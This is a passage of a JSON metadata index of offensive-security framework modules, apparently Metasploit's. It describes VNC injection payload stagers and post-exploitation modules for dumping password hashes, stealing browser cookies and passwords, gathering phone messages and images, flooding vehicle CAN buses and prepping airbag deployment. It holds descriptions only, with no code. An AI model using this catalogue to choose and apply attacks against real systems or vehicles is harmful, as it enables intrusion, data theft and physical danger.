"ref_name": "windows/x64/vncinject/bind_named_pipe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/vncinject/bind_tcp": {
"name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager",
"full_name": "payload/windows/x64/vncinject/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for a connection (Windows x64)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/x64/bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/x64/vncinject/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/vncinject/bind_tcp_uuid": {
"name": "Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)",
"full_name": "payload/windows/x64/vncinject/bind_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for a connection with UUID Support (Windows x64)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/x64/vncinject/bind_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/vncinject/reverse_http": {
"name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)",
"full_name": "payload/windows/x64/vncinject/reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTP (Windows x64 wininet)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-03-20 11:27:43 +0000",
"path": "/modules/payloads/stagers/windows/x64/reverse_http.rb",
"is_install_path": true,
"ref_name": "windows/x64/vncinject/reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/vncinject/reverse_https": {
"name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)",
"full_name": "payload/windows/x64/vncinject/reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"agix",
"rwincey"
],
"description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTP (Windows x64 wininet)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-03-20 11:27:43 +0000",
"path": "/modules/payloads/stagers/windows/x64/reverse_https.rb",
"is_install_path": true,
"ref_name": "windows/x64/vncinject/reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/vncinject/reverse_tcp": {
"name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager",
"full_name": "payload/windows/x64/vncinject/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker (Windows x64)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/x64/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "windows/x64/vncinject/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/vncinject/reverse_tcp_rc4": {
"name": "Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
"full_name": "payload/windows/x64/vncinject/reverse_tcp_rc4",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"mihi",
"max3raza",
"RageLtMan"
],
"description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-03-04 17:43:15 +0000",
"path": "/modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb",
"is_install_path": true,
"ref_name": "windows/x64/vncinject/reverse_tcp_rc4",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/x64/vncinject/reverse_tcp_uuid": {
"name": "Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)",
"full_name": "payload/windows/x64/vncinject/reverse_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker with UUID Support (Windows x64)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/x64/vncinject/reverse_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/vncinject/reverse_winhttp": {
"name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)",
"full_name": "payload/windows/x64/vncinject/reverse_winhttp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTP (Windows x64 winhttp)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-03-20 11:27:43 +0000",
"path": "/modules/payloads/stagers/windows/x64/reverse_winhttp.rb",
"is_install_path": true,
"ref_name": "windows/x64/vncinject/reverse_winhttp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/vncinject/reverse_winhttps": {
"name": "Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)",
"full_name": "payload/windows/x64/vncinject/reverse_winhttps",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTPS (Windows x64 winhttp)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-03-20 11:27:43 +0000",
"path": "/modules/payloads/stagers/windows/x64/reverse_winhttps.rb",
"is_install_path": true,
"ref_name": "windows/x64/vncinject/reverse_winhttps",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_aix/hashdump": {
"name": "AIX Gather Dump Password Hashes",
"full_name": "post/aix/hashdump",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "Post Module to dump the password hashes for all users on an AIX System",
"references": [
],
"platform": "AIX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/aix/hashdump.rb",
"is_install_path": true,
"ref_name": "aix/hashdump",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_android/capture/screen": {
"name": "Android Screen Capture",
"full_name": "post/android/capture/screen",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"timwr"
],
"description": "This module takes a screenshot of the target phone.",
"references": [
],
"platform": "Android",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/android/capture/screen.rb",
"is_install_path": true,
"ref_name": "android/capture/screen",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_android/gather/sub_info": {
"name": "extracts subscriber info from target device",
"full_name": "post/android/gather/sub_info",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Auxilus"
],
"description": "This module displays the subscriber info stored on the target phone.\n It uses call service to get values of each transaction code like imei etc.",
"references": [
],
"platform": "Android",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-10-01 16:54:46 +0000",
"path": "/modules/post/android/gather/sub_info.rb",
"is_install_path": true,
"ref_name": "android/gather/sub_info",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_android/gather/wireless_ap": {
"name": "Displays wireless SSIDs and PSKs",
"full_name": "post/android/gather/wireless_ap",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Auxilus",
"timwr"
],
"description": "This module displays all wireless AP creds saved on the target device.",
"references": [
],
"platform": "Android",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-06 17:37:12 +0000",
"path": "/modules/post/android/gather/wireless_ap.rb",
"is_install_path": true,
"ref_name": "android/gather/wireless_ap",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_android/manage/remove_lock": {
"name": "Android Settings Remove Device Locks (4.0-4.3)",
"full_name": "post/android/manage/remove_lock",
"rank": 300,
"disclosure_date": "2013-10-11",
"type": "post",
"author": [
"CureSec",
"timwr"
],
"description": "This module exploits a bug in the Android 4.0 to 4.3 com.android.settings.ChooseLockGeneric class.\n Any unprivileged app can exploit this vulnerability to remove the lockscreen.\n A logic flaw / design error exists in the settings application that allows an Intent from any\n application to clear the screen lock. The user may see that the Settings application has crashed,\n and the phone can then be unlocked by a swipe.\n This vulnerability was patched in Android 4.4.",
"references": [
"CVE-2013-6271",
"URL-http://blog.curesec.com/article/blog/26.html",
"URL-http://www.curesec.com/data/advisories/Curesec-2013-1011.pdf"
],
"platform": "Android",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/android/manage/remove_lock.rb",
"is_install_path": true,
"ref_name": "android/manage/remove_lock",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_android/manage/remove_lock_root": {
"name": "Android Root Remove Device Locks (root)",
"full_name": "post/android/manage/remove_lock_root",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"timwr"
],
"description": "This module uses root privileges to remove the device lock.\n In some cases the original lock method will still be present but any key/gesture will\n unlock the device.",
"references": [
],
"platform": "Android",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/android/manage/remove_lock_root.rb",
"is_install_path": true,
"ref_name": "android/manage/remove_lock_root",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_apple_ios/gather/ios_image_gather": {
"name": "iOS Image Gatherer",
"full_name": "post/apple_ios/gather/ios_image_gather",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Shelby Pace"
],
"description": "This module collects images from iPhones.\n Module was tested on iOS 10.3.3 on an iPhone 5.",
"references": [
],
"platform": "Apple_iOS",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-11-02 08:01:15 +0000",
"path": "/modules/post/apple_ios/gather/ios_image_gather.rb",
"is_install_path": true,
"ref_name": "apple_ios/gather/ios_image_gather",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_apple_ios/gather/ios_text_gather": {
"name": "iOS Text Gatherer",
"full_name": "post/apple_ios/gather/ios_text_gather",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Shelby Pace"
],
"description": "This module collects text messages from iPhones.\n Tested on iOS 10.3.3 on an iPhone 5.",
"references": [
],
"platform": "Apple_iOS",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-11-02 08:01:15 +0000",
"path": "/modules/post/apple_ios/gather/ios_text_gather.rb",
"is_install_path": true,
"ref_name": "apple_ios/gather/ios_text_gather",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_cisco/gather/enum_cisco": {
"name": "Cisco Gather Device General Information",
"full_name": "post/cisco/gather/enum_cisco",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module collects a Cisco IOS or NXOS device information and configuration.",
"references": [
],
"platform": "Cisco",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/cisco/gather/enum_cisco.rb",
"is_install_path": true,
"ref_name": "cisco/gather/enum_cisco",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_firefox/gather/cookies": {
"name": "Firefox Gather Cookies from Privileged Javascript Shell",
"full_name": "post/firefox/gather/cookies",
"rank": 300,
"disclosure_date": "2014-03-26",
"type": "post",
"author": [
"joev <joev@metasploit.com>"
],
"description": "This module allows collection of cookies from a Firefox Privileged Javascript Shell.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/firefox/gather/cookies.rb",
"is_install_path": true,
"ref_name": "firefox/gather/cookies",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_firefox/gather/history": {
"name": "Firefox Gather History from Privileged Javascript Shell",
"full_name": "post/firefox/gather/history",
"rank": 300,
"disclosure_date": "2014-04-11",
"type": "post",
"author": [
"joev <joev@metasploit.com>"
],
"description": "This module allows collection of the entire browser history from a Firefox\n Privileged Javascript Shell.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/firefox/gather/history.rb",
"is_install_path": true,
"ref_name": "firefox/gather/history",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_firefox/gather/passwords": {
"name": "Firefox Gather Passwords from Privileged Javascript Shell",
"full_name": "post/firefox/gather/passwords",
"rank": 300,
"disclosure_date": "2014-04-11",
"type": "post",
"author": [
"joev <joev@metasploit.com>"
],
"description": "This module allows collection of passwords from a Firefox Privileged Javascript Shell.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/firefox/gather/passwords.rb",
"is_install_path": true,
"ref_name": "firefox/gather/passwords",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_firefox/gather/xss": {
"name": "Firefox XSS",
"full_name": "post/firefox/gather/xss",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"joev <joev@metasploit.com>"
],
"description": "This module runs the provided SCRIPT as javascript in the\n origin of the provided URL. It works by navigating to a hidden\n ChromeWindow to the URL, then injecting the SCRIPT with Function().\n The callback \"send(result)\" is used to send data back to the listener.",
"references": [
],
"platform": "Firefox",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/firefox/gather/xss.rb",
"is_install_path": true,
"ref_name": "firefox/gather/xss",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_firefox/manage/webcam_chat": {
"name": "Firefox Webcam Chat on Privileged Javascript Shell",
"full_name": "post/firefox/manage/webcam_chat",
"rank": 300,
"disclosure_date": "2014-05-13",
"type": "post",
"author": [
"joev <joev@metasploit.com>"
],
"description": "This module allows streaming a webcam from a privileged Firefox Javascript shell.",
"references": [
"URL-http://www.rapid7.com/db/modules/exploit/firefox/local/exec_shellcode"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/firefox/manage/webcam_chat.rb",
"is_install_path": true,
"ref_name": "firefox/manage/webcam_chat",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_hardware/automotive/can_flood": {
"name": "CAN Flood",
"full_name": "post/hardware/automotive/can_flood",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Pietro Biondi"
],
"description": "This module floods a CAN interface with supplied frames.",
"references": [
],
"platform": "Hardware",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-01 12:04:31 +0000",
"path": "/modules/post/hardware/automotive/can_flood.rb",
"is_install_path": true,
"ref_name": "hardware/automotive/can_flood",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_hardware/automotive/canprobe": {
"name": "Module to Probe Different Data Points in a CAN Packet",
"full_name": "post/hardware/automotive/canprobe",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Craig Smith"
],
"description": "Scans between two CAN IDs and writes data at each byte position. It will\n either write a set byte value (Default 0xFF) or iterate through all possible values\n of that byte position (takes much longer). Does not check for responses and is\n basically a simple blind fuzzer.",
"references": [
],
"platform": "Hardware",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/hardware/automotive/canprobe.rb",
"is_install_path": true,
"ref_name": "hardware/automotive/canprobe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_hardware/automotive/getvinfo": {
"name": "Get the Vehicle Information Such as the VIN from the Target Module",
"full_name": "post/hardware/automotive/getvinfo",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Craig Smith"
],
"description": "Post Module to query DTCs, Some common engine info and Vehicle Info.\n It returns such things as engine speed, coolant temp, Diagnostic\n Trouble Codes as well as All info stored by Mode $09 Vehicle Info, VIN, etc",
"references": [
],
"platform": "Hardware",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-11 18:20:57 +0000",
"path": "/modules/post/hardware/automotive/getvinfo.rb",
"is_install_path": true,
"ref_name": "hardware/automotive/getvinfo",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_hardware/automotive/identifymodules": {
"name": "Scan CAN Bus for Diagnostic Modules",
"full_name": "post/hardware/automotive/identifymodules",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Craig Smith"
],
"description": "Post Module to scan the CAN bus for any modules that can respond to UDS DSC queries",
"references": [
],
"platform": "Hardware",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/hardware/automotive/identifymodules.rb",
"is_install_path": true,
"ref_name": "hardware/automotive/identifymodules",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_hardware/automotive/malibu_overheat": {
"name": "Sample Module to Flood Temp Gauge on 2006 Malibu",
"full_name": "post/hardware/automotive/malibu_overheat",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Craig Smith"
],
"description": "Simple sample temp flood for the 2006 Malibu",
"references": [
],
"platform": "Hardware",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/hardware/automotive/malibu_overheat.rb",
"is_install_path": true,
"ref_name": "hardware/automotive/malibu_overheat",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_hardware/automotive/pdt": {
"name": "Check For and Prep the Pyrotechnic Devices (Airbags, Battery Clamps, etc.)",
"full_name": "post/hardware/automotive/pdt",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Johannes Braun",
"Juergen Duerrwang",
"Craig Smith"
],
"description": "Acting in the role of a Pyrotechnical Device Deployment Tool (PDT), this module\n will first query all Pyrotechnic Control Units (PCUs) in the target vehicle\n to discover how many pyrotechnic devices are present, then attempt to validate\n the security access token using the default simplified algorithm. On success,\n the vehicle will be in a state that is prepped to deploy its pyrotechnic devices\n (e.g. airbags, battery clamps, etc.) via the service routine. (ISO 26021)",
"references": [
"CVE-2017-14937",
"URL-https://www.researchgate.net/publication/321183727_Security_Evaluation_of_an_Airbag-ECU_by_Reusing_Threat_Modeling_Artefacts"
],
"platform": "Hardware",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-12-17 18:15:49 +0000",
"path": "/modules/post/hardware/automotive/pdt.rb",
"is_install_path": true,
"ref_name": "hardware/automotive/pdt",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_hardware/rftransceiver/rfpwnon": {
"name": "Brute Force AM/OOK (ie: Garage Doors)",
"full_name": "post/hardware/rftransceiver/rfpwnon",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Craig Smith"
],
"description": "Post Module for HWBridge RFTranscievers. Brute forces AM OOK or raw\n binary signals. This is a port of the rfpwnon tool by Corey Harding.\n (https://github.com/exploitagency/github-rfpwnon/blob/master/rfpwnon.py)",
"references": [
],
"platform": "Hardware",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/hardware/rftransceiver/rfpwnon.rb",
"is_install_path": true,
"ref_name": "hardware/rftransceiver/rfpwnon",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_hardware/rftransceiver/transmitter": {
"name": "RF Transceiver Transmitter",
"full_name": "post/hardware/rftransceiver/transmitter",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Craig Smith"
],
"description": "This module powers an HWBridge-connected radio transceiver,\n effectively transmitting on the frequency set by the FREQ option.\n\n NOTE: Users of this module should be aware of their local laws,\n regulations, and licensing requirements for transmitting on any\n given radio frequency.",
"references": [
"URL-https://github.com/AndrewMohawk/RfCatHelpers"
],
"platform": "Hardware",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/hardware/rftransceiver/transmitter.rb",
"is_install_path": true,
"ref_name": "hardware/rftransceiver/transmitter",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_hardware/zigbee/zstumbler": {
"name": "Sends Beacons to Scan for Active ZigBee Networks",
"full_name": "post/hardware/zigbee/zstumbler",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Craig Smith"
],
"description": "Post Module to send beacon signals to the broadcast address while\n channel hopping",
"references": [
],
"platform": "Hardware",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/hardware/zigbee/zstumbler.rb",
"is_install_path": true,
"ref_name": "hardware/zigbee/zstumbler",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_juniper/gather/enum_juniper": {
"name": "Juniper Gather Device General Information",
"full_name": "post/juniper/gather/enum_juniper",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"h00die"
],
"description": "This module collects a Juniper ScreenOS and JunOS device information and configuration.",
"references": [
],
"platform": "Juniper",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-07-30 14:20:01 +0000",
"path": "/modules/post/juniper/gather/enum_juniper.rb",
"is_install_path": true,
"ref_name": "juniper/gather/enum_juniper",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/busybox/enum_connections": {
"name": "BusyBox Enumerate Connections",
"full_name": "post/linux/busybox/enum_connections",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Javier Vicente Vallejo"
],
"description": "This module will be applied on a session connected to a BusyBox shell. It will\n enumerate the connections established with the router or device executing BusyBox.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/linux/busybox/enum_connections.rb",
"is_install_path": true,
"ref_name": "linux/busybox/enum_connections",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/busybox/enum_hosts": {
"name": "BusyBox Enumerate Host Names",
"full_name": "post/linux/busybox/enum_hosts",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Javier Vicente Vallejo"
],
"description": "This module will be applied on a session connected to a BusyBox shell. It will enumerate\n host names related to the device executing BusyBox.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/linux/busybox/enum_hosts.rb",
"is_install_path": true,
"ref_name": "linux/busybox/enum_hosts",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/busybox/jailbreak": {
"name": "BusyBox Jailbreak ",
"full_name": "post/linux/busybox/jailbreak",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Javier Vicente Vallejo"
],
"description": "This module will send a set of commands to an open session that is connected to a\n BusyBox limited shell (i.e. a router limited shell). It will try different known\n tricks to jailbreak the limited shell and get a full BusyBox shell.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/post/linux/busybox/jailbreak.rb",
"is_install_path": true,
"ref_name": "linux/busybox/jailbreak",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/busybox/ping_net": {
"name": "BusyBox Ping Network Enumeration",
"full_name": "post/linux/busybox/ping_net",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Javier Vicente Vallejo"
],
"description": "This module will be applied on a session connected to a BusyBox shell. It will ping a range\n of IP addresses from the router or device executing BusyBox.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/linux/busybox/ping_net.rb",
"is_install_path": true,
"ref_name": "linux/busybox/ping_net",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/busybox/set_dmz": {
"name": "BusyBox DMZ Configuration",
"full_name": "post/linux/busybox/set_dmz",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Javier Vicente Vallejo"
],
"description": "This module will be applied on a session connected to a BusyBox shell. It allows to manage\n traffic forwarding to a target host through the BusyBox device.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/linux/busybox/set_dmz.rb",
"is_install_path": true,
"ref_name": "linux/busybox/set_dmz",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_linux/busybox/set_dns": {
"name": "BusyBox DNS Configuration",
"full_name": "post/linux/busybox/set_dns",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Javier Vicente Vallejo"
],
"description": "This module will be applied on a session connected to a BusyBox shell. It allows\n to set the DNS server on the device executing BusyBox so it will be sent by the\n DHCP server to network hosts.",
"references": [
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/linux/busybox/set_dns.rb",
"is_install_path": true,
